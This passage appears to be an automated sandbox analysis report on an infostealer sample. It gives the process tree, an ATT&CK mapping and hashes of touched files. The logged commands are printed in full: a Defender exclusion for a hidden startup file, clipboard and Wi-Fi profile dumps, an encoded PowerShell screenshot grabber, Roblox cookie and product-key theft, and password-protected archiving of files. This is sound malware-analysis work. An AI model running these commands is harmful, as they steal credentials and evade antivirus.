        PID:5632
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,4049274030429396873,5048336487106292670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"
      4⤵
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:908
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1860
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcolic0n\gcolic0n.cmdline"
        5⤵
        
        PID:5832
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7956.tmp" "c:\Users\Admin\AppData\Local\Temp\gcolic0n\CSC5062703058BA4C24B2AE7DDDF877AC7D.TMP"
        6⤵
        
        PID:6044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5344
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5652
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5872
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5948
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3164
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41642\rar.exe a -r -hp"dave123" "C:\Users\Admin\AppData\Local\Temp\awEI4.zip" *"
    3⤵
    PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\_MEI41642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI41642\rar.exe a -r -hp"dave123" "C:\Users\Admin\AppData\Local\Temp\awEI4.zip" *
      4⤵
      Executes dropped EXE
      PID:5788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:6084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5256

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
cce2292397e295bab37c6e1fbb3f7b75

SHA1
4d74bc956e0934bb1eefef12ee66a4fcfc1623a3

SHA256
2cfa366cd54e0eada84a0e8b463c14c2f56203577d30223b6446af781580b3fb

SHA512
ae2c3baac21c91a5f939b825c45e6bd100f0776bd296079cdbdc23846eda847e45b185542f9e32e0b107895351eae33c22469bbcc4e3cdd22bae29bc3839d4d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
d616ec696534f890ca7a779ce657c193

SHA1
65ce104180604fff53d729e5d89011d22a81851f

SHA256
afe6237f3ee98d703643b81d1c6ab25db449587caa47db1f780d69e002366cab

SHA512
99c2d46bbb892e7da18521b3933bfc665227a9c6a19cf51d0c33453290a335a9fe2569885dc464e1398b616d13d392dcd2c3d65938352128b237e70e3004f644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
995298f883973164b6f83ca54c001d92

SHA1
a2655d96df00448fc694f0efd2a6f69d2d2b37bb

SHA256
87d324fa472e0235328f529e1ddb4d7feacfd81e7a15c162ab8890a65fe06be2

SHA512
4d60da4b431863af61019f4b115ec2c18b39a97c2b1ee47ab77b96c23b6f13eb8ce86d698f92544e519fb47fbb19ed8be00ce3172282deedf87853db24ea346b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a1ad7798f60d49d489b26b1b7f4cd066

SHA1
557fbf577700b432abcfb3c4615090818135bea6

SHA256
4796803d54b3d364126984011f8127678a7c7b9cdabd57e68e9f584a60908123

SHA512
aa39fc8ad60f69ed0770e2a5745d8b530d0a05bc146cfca2025074794ea9072c5e08f2d815a1f1b08467f27845f08762ce7b54f101cee88db268728210468ef4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a1fc9e7ee9b75e44062c6e23ada0e330

SHA1
841ef55ddaf039cd7066a19764ea9768249c3384

SHA256
23a0773fb71b4854809ac054ccf3c602a8cc88606001e7f22f340e25903921a8

SHA512
383b4b5c90b0044f61254381508ab321e48d3f64bc25b087a2b8625fe31f737224556bfbb5428757bd82cfe58ce24407f84e8b9b63ea8a42f5823bc1f5084b6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
